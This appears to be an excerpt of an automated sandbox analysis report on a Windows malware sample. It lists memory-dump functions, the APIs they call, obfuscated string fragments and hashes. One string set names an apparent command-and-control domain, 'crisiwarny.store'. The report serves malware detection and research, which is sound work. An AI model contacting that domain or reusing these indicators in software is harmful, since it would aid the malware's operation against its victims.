                                                                                          • API String ID: 621844428-155395596
                                                                                          • Opcode ID: eef272983cc2b26d5bfa48949e632927f892c540fd56c68c3b19bfbba45031bc
                                                                                          • Instruction ID: 705d0042d3bfdfdb8b90f59c70e884d1be2a8d3205016936bf44b78e70af1ffa
                                                                                          • Opcode Fuzzy Hash: eef272983cc2b26d5bfa48949e632927f892c540fd56c68c3b19bfbba45031bc
                                                                                          • Instruction Fuzzy Hash: A5519C62B5871017E318A6748C523BFABD1DF86318F198D2ED9C5EB3C2D92C8C058786
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de512dc28ee53194ef31629311702fee87b15a939415f20c19ddd1b408c4b29d
                                                                                          • Instruction ID: 10bafb4872d25c585f06000d08e67fce3ea9b67786b1c4ba640033cb4d0fb38b
                                                                                          • Opcode Fuzzy Hash: de512dc28ee53194ef31629311702fee87b15a939415f20c19ddd1b408c4b29d
                                                                                          • Instruction Fuzzy Hash: 4DD134B59007008FD7249F29C881B67B7E2FF49314F18896ED49A8B792E738F801CB55
                                                                                          APIs
                                                                                          • CoUninitialize.COMBASE(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001,00000001,?,?,?,00000001,00000001), ref: 00481379
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Uninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 3861434553-0
                                                                                          • Opcode ID: 1c0a47e923f70dc2f627e9cfb60b62467db29b14926ed8260bf4ed431624d425
                                                                                          • Instruction ID: da6442765b1f2c49d11d91e5adecd8027053a5b048c37e7dd1843a5bb85abe4d
                                                                                          • Opcode Fuzzy Hash: 1c0a47e923f70dc2f627e9cfb60b62467db29b14926ed8260bf4ed431624d425
                                                                                          • Instruction Fuzzy Hash: AFB14BB5A103404BD710AF329CD266B77E6AF95318F08853DE84B4B783EB3DE815875A
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004AE2A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: 1048c3025e0b4ddacca64e2b79def29365ef645ea27283a32564340b2f92fe60
                                                                                          • Instruction ID: 8b9e036879fc29620f9d8ce957160a136b0565f8986e72e1014e0afb650f187e
                                                                                          • Opcode Fuzzy Hash: 1048c3025e0b4ddacca64e2b79def29365ef645ea27283a32564340b2f92fe60
                                                                                          • Instruction Fuzzy Hash: 6011AB37E042108FC3108F28DCA1797BB5AEBC6310F2A013DDC804B680CA385806CBC1
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(004B46AD,005C003F,00000006,?,?,00000018,?,?,?), ref: 004B0F3E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: e02af52bb8697f7aa81e46a96e7e502b6df8d18a0aaff66103c7ea11f7d16193
                                                                                          • Instruction ID: 18cb775952d2a633041d26e840568d4881b7dd09ace3d0c691814e777f7e031b
                                                                                          • Opcode Fuzzy Hash: e02af52bb8697f7aa81e46a96e7e502b6df8d18a0aaff66103c7ea11f7d16193
                                                                                          • Instruction Fuzzy Hash: 763124715083009BD318DF68D8D16ABBBF5FBD5314F04893DEA8587391D3389848CB66
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 81b789075639b6dbc614758fff6b8f7a7938311485cec5de8d483d0da30744bc
                                                                                          • Instruction ID: 430dd5d39ef2f46c2491ef4dee67eb11ab7f9f307eccd6e70676c1a5a08251e4
                                                                                          • Opcode Fuzzy Hash: 81b789075639b6dbc614758fff6b8f7a7938311485cec5de8d483d0da30744bc
                                                                                          • Instruction Fuzzy Hash: C9D17A726483004BDF148E2888816AB7BE2EF95314F19863EE9954B395E23CDD1A93C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 96acf46fdbe788074ee13e797b233586d55e36c59aa1de51ed408d8422ddb428
                                                                                          • Instruction ID: b6d361422a80e4ae0f4affe6100ced7fa3ed35a44cc95cc3c324d4b7e7c456ce
                                                                                          • Opcode Fuzzy Hash: 96acf46fdbe788074ee13e797b233586d55e36c59aa1de51ed408d8422ddb428
                                                                                          • Instruction Fuzzy Hash: 7EB1287260C3808AD3149A3C895436BBBD2EBEA314F198B2EE4D6833D7D77C8545835B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d455d9af3f456d1efb09a4e9978f32492d72e6cc7b63d51f0a803d10c0f0cd6
                                                                                          • Instruction ID: d28de85c109b042a2d5596ea30ba57306967e1c27873f7f09b687d9e1dbff8d9
                                                                                          • Opcode Fuzzy Hash: 0d455d9af3f456d1efb09a4e9978f32492d72e6cc7b63d51f0a803d10c0f0cd6
                                                                                          • Instruction Fuzzy Hash: 68412A72748301DFD7188F24DC92BABB7E5EB89304F08483DE581932A1D678E855C756

                                                                                          Control-flow Graph (legend: Executed / Not Executed; entry block 480ca0-480cbb, CoInitializeSecurity)
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00480CB2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID: BC02FCD6C80496ACB65E466FA2C3ADFE$Mz$crisiwarny.store$tO
                                                                                          • API String ID: 640775948-3138379286
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          APIs
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 00480C8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 9ad12372ba7bf421b1ac3ba47cfa5b3afd48f52e7159ef6189454c52423cb534
                                                                                          • Instruction ID: 7fee5bb7e9f0b951e113e02a5583b45ee3adb9f42b3387dedd3aeaca2431d40b
                                                                                          • Opcode Fuzzy Hash: 9ad12372ba7bf421b1ac3ba47cfa5b3afd48f52e7159ef6189454c52423cb534
                                                                                          • Instruction Fuzzy Hash: 3331ECB1C10B40ABD730BA3D9A0B6177EB4A701660F40472DFCE69A6C4F230A4298BD7
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 004B0ED8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 2e53c1907d85f765d63b753eab457c1ae837682a34852da0d22630189b8e21c7
                                                                                          • Instruction ID: b489f6579ef6908213d0403661e4491e33e9124e7ee7d73aef94669666452d2e
                                                                                          • Opcode Fuzzy Hash: 2e53c1907d85f765d63b753eab457c1ae837682a34852da0d22630189b8e21c7
                                                                                          • Instruction Fuzzy Hash: 6A11BD33F501228BDB188F79EC616EE7750FB45324B0907BAE827E7240DA7CDA004794
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004AE204
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: c838de0129c88a0a7c189c159f54bb14a7191256dae1611617c02c02eef0539c
                                                                                          • Instruction ID: f9edcf7aaa7a1a7ffa81ad3bf393746f8d007d78a2ec6db438de783c6cdd5883
                                                                                          • Opcode Fuzzy Hash: c838de0129c88a0a7c189c159f54bb14a7191256dae1611617c02c02eef0539c
                                                                                          • Instruction Fuzzy Hash: 43F0E97429D3505BD3088B10DCA171A7FA69BE1304F08487EE4D107391C27E581DD777
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: 80dc36b2ef8b0def03416d257071dbedf3ba23eb26a44c3c89bedb5550bcdd9a
                                                                                          • Instruction ID: a0b180bf022e6894a73c6746e368428d1812ca8e619410bd97401f134a2f710b
                                                                                          • Opcode Fuzzy Hash: 80dc36b2ef8b0def03416d257071dbedf3ba23eb26a44c3c89bedb5550bcdd9a
                                                                                          • Instruction Fuzzy Hash: C1F028B4108701CFE315EF69D1A875ABBF0FB85304F10495CE4958B3A0C7B6A959CF82
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: c6971ba0a85e16b50440a941023e782103e6f85e84001d670ba7fa3adb5830d2
                                                                                          • Instruction ID: 48bb4216f7d500d9db531adab3a224e90b9081716a9165826b2060abfb62b8d3
                                                                                          • Opcode Fuzzy Hash: c6971ba0a85e16b50440a941023e782103e6f85e84001d670ba7fa3adb5830d2
                                                                                          • Instruction Fuzzy Hash: EBF074701083418FE320EF15C15870ABBE4BFC5304F11891CE4988B291CBB595488F83
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ($+$-$/$0$1$2$3$4$8$8$9$9$;$<$=$>$?$?$@$A$B$C$E$G$H$I$K$M$O$Q$S$S$U$W$Y$[$\$]$_$a$c$e$g$i$k$m$o$q$s$u$w$x$y${$|$|$}
                                                                                          • API String ID: 0-901420310
                                                                                          • Opcode ID: f6c2d255fbf562c9fe7537ca20b144c0394eb154a58bd892bf773235e869bdf3
                                                                                          • Instruction ID: 87893eee26e1cc2c25f75ce585a84271741d1b0b36ba0d64c640fc5dfe70848e
                                                                                          • Opcode Fuzzy Hash: f6c2d255fbf562c9fe7537ca20b144c0394eb154a58bd892bf773235e869bdf3
                                                                                          • Instruction Fuzzy Hash: 492231219087E98DDB32C67C8C487DDBEA15B67324F0843D9D1E96B2D2C3B50B85CB66
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !$#$$$%$'$)$+$-$/$0$1$3$4$5$7$9$;$<$=$>$?$@$A$E$E$G$H$M$X$Y$[$h$r$s$t
                                                                                          • API String ID: 0-3672740722
                                                                                          • Opcode ID: 17e3c8e93f7620fe6ba21d93112768e57a31f822a819bbddac78e81d67dfd030
                                                                                          • Instruction ID: 584e3c890854bc230a50586232257224613fdf4a5e857ce3dbfd63c9705b4f4b
                                                                                          • Opcode Fuzzy Hash: 17e3c8e93f7620fe6ba21d93112768e57a31f822a819bbddac78e81d67dfd030
                                                                                          • Instruction Fuzzy Hash: 94E19421D086E98EDB22CA7C88043DDBFB15B63314F1842DDD4E9AB3D2C7794A45CB56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: G"A$&+$*$/E;C$/$$2A"_$@C$O\$SX$_Y$h#j=$i'd!$lF$m9O7$pq$pq$r3$31
                                                                                          • API String ID: 0-1158987392
                                                                                          • Opcode ID: d6f4684e4ff2d40999717de5456ef6074d76474ae34d32b0898c0b78fec391e5
                                                                                          • Instruction ID: 324797201778d1949ef9a31adeef393bc0e06b99eea1260be55d07f3c96e2186
                                                                                          • Opcode Fuzzy Hash: d6f4684e4ff2d40999717de5456ef6074d76474ae34d32b0898c0b78fec391e5
                                                                                          • Instruction Fuzzy Hash: 34721CB41083858BE334CF25D881B9FBBE1FB96304F10892DE6D99B251EB749146CF96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
                                                                                          • API String ID: 0-3131871939
                                                                                          • Opcode ID: b3002ac555fd4045b96c3bdd8a1902b5ac4800e177dfe01a4fbb748fd12a8052
                                                                                          • Instruction ID: b6af2505bffb2492008ea28c34d98f468ba73d19fa4dc019693df66fa38c4e4c
                                                                                          • Opcode Fuzzy Hash: b3002ac555fd4045b96c3bdd8a1902b5ac4800e177dfe01a4fbb748fd12a8052
                                                                                          • Instruction Fuzzy Hash: B6E207716083518FC718CF28C4943ABBBE2AF95314F18C66EE4998B391D378DD45DB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &?3$,/.1$3210$4761$8;:5$8?$L$RdOh$X[Z]$dgfi$h$mdOh$w`k
                                                                                          • API String ID: 0-3944949542
                                                                                          • Opcode ID: 38eab78a967925801faf1db9e4f126c6c3faf7633c3a6bd056201facaf4d7696
                                                                                          • Instruction ID: 7fd0e072baea035290ee23cc241a0bc29d61be325b64be2915523b8a2b511e7a
                                                                                          • Opcode Fuzzy Hash: 38eab78a967925801faf1db9e4f126c6c3faf7633c3a6bd056201facaf4d7696
                                                                                          • Instruction Fuzzy Hash: 7FB2EF7150C3818FDB25CF25C4907ABBBE2AFD6304F18896EE4D98B391D7789805CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                          • API String ID: 0-3385986306
                                                                                          • Opcode ID: 8371ee66e64a4e8842674acbb49de53691a9809fbba8010f2f87db5d1c77bf15
                                                                                          • Instruction ID: 4190ce47a1fd5d53ad13a7f6e5aceab9ef25a52f08cbd9d1a183ba445e6762fe
                                                                                          • Opcode Fuzzy Hash: 8371ee66e64a4e8842674acbb49de53691a9809fbba8010f2f87db5d1c77bf15
                                                                                          • Instruction Fuzzy Hash: A282C471A093818FC719CE28C69039BBBE1BB85304F18C96EE4D997391D3B8DD45CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: KI$;II$JJI$LCI$PII$b6I$DI
                                                                                          • API String ID: 0-2116176574
                                                                                          • Opcode ID: 65c47d45df86913ef38f1ddbfd8ba2c8f8ed99c61ba1f927fc4b4631e77d9f5b
                                                                                          • Instruction ID: af1ace9a6d1076eeb7c2189050beb8a2352cab1463604713cf56651433f4907a
                                                                                          • Opcode Fuzzy Hash: 65c47d45df86913ef38f1ddbfd8ba2c8f8ed99c61ba1f927fc4b4631e77d9f5b
                                                                                          • Instruction Fuzzy Hash: B2728FB0508F808ED3268F3C8845797BFD5AB5A314F188A6ED0EE873D2C7B96505C766
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "uI$2yI$3768$:?-)$InA>$i7b0$~x||
                                                                                          • API String ID: 0-360038573
                                                                                          • Opcode ID: 05d4d888b6254113b1e66ab4a44fe70c0105bdb77b3960477178ea3426ba4001
                                                                                          • Instruction ID: 588cbe3c59b79e022c2d572c0a52731f53282abe1ab50778504afbdfb9be80f3
                                                                                          • Opcode Fuzzy Hash: 05d4d888b6254113b1e66ab4a44fe70c0105bdb77b3960477178ea3426ba4001
                                                                                          • Instruction Fuzzy Hash: 46320072A18311CFD714CF28DC8162ABBE5FB89310F198A7DE985973A0D778E811CB85
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [lT$ H$?c;}$iX)$ij$ZlT$]Z[
                                                                                          • API String ID: 0-4280902838
                                                                                          • Opcode ID: 7ed60dc9a06f979207a85483ffbd187b2f510a4945f41496ba3893f2075de21f
                                                                                          • Instruction ID: 8c69e8c3b85ad40de87f72d81b34076e7796ffd33b4fc48323a6b8f2c6f0afe1
                                                                                          • Opcode Fuzzy Hash: 7ed60dc9a06f979207a85483ffbd187b2f510a4945f41496ba3893f2075de21f
                                                                                          • Instruction Fuzzy Hash: E432C1B1600701CFC724DF29C49162ABBF2FF95314B19CA6ED4968BB92D738E845CB94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *9ym$QF?$`EP}$y\o~$#Z$|_=
                                                                                          • API String ID: 0-4142179701
                                                                                          • Opcode ID: d006cd02d65a2cea60ca31941fece47e481ea7f40ebc6e28bcff79b514b3523e
                                                                                          • Instruction ID: 5f8dc6ef8167e7366b19a660386e69f64e7782b56cef18bb3c2663600b4bc497
                                                                                          • Opcode Fuzzy Hash: d006cd02d65a2cea60ca31941fece47e481ea7f40ebc6e28bcff79b514b3523e
                                                                                          • Instruction Fuzzy Hash: 2EB248F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DEAC4C7744EA3558058696
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @ffI$BC02FCD6C80496ACB65E466FA2C3ADFE$itkj$q`h}$xy$yleh$uw
                                                                                          • API String ID: 0-1013037425
                                                                                          • Opcode ID: d0ab14ef961f87c292820218db201db2781a9e86216fa30409d63ecf405ffd97
                                                                                          • Instruction ID: 2d3a79cd3d09fce7cee746ef6da28dff70190ee099a263b665b5a8922f0f1de2
                                                                                          • Opcode Fuzzy Hash: d0ab14ef961f87c292820218db201db2781a9e86216fa30409d63ecf405ffd97
                                                                                          • Instruction Fuzzy Hash: DEC1F1B06083849FD314DF25D8857AFBBE1EF96308F14892DE1D98B392D6788509CB96
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(C5A2897E), ref: 004A0B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: lcw|<a$o~{q$w|<a${{up
                                                                                          • API String ID: 3664257935-3972657743
                                                                                          • Opcode ID: 2fdb716fb734336c641400e989a2ccb28f128cb9f6315dcb1059d3878b0cac65
                                                                                          • Instruction ID: 07138dc39de0be2698a92a8f52a1fa011958647e3a988ad4d4fda829288976c1
                                                                                          • Opcode Fuzzy Hash: 2fdb716fb734336c641400e989a2ccb28f128cb9f6315dcb1059d3878b0cac65
                                                                                          • Instruction Fuzzy Hash: DAA138702047428FE3258F24C891763BBA2FF66314F28865ED4A60B7D2D779E806C7A5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5*?W$7\J[$SGp$TN~}$iP
                                                                                          • API String ID: 0-2613427793
                                                                                          • Opcode ID: 9bc60512393515936dd2aea9ffb9fb5a95256ac1f35aada804f9f7d0de672156
                                                                                          • Instruction ID: f4fb52fe9b723a5236d526bf5499ef086853c16b9a4d15b2c9608a87c9f79378
                                                                                          • Opcode Fuzzy Hash: 9bc60512393515936dd2aea9ffb9fb5a95256ac1f35aada804f9f7d0de672156
                                                                                          • Instruction Fuzzy Hash: C7B2E6F3A082049FE3046E2DEC8567AFBE9EF94720F1A493DEAC5C3744E93558058697
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y^S$#g>#$$*- $UjcW$YRTP$o$
                                                                                          • API String ID: 0-2638604102
                                                                                          • Opcode ID: 581ebc1a5f145eae30b509ced77de9bec468b856ee78ffd6995f457f4522b386
                                                                                          • Instruction ID: 4d6e7614ae4278167f0cbbc3e35f776c599ea5a08edc2dda41e5faae3ef0bc52
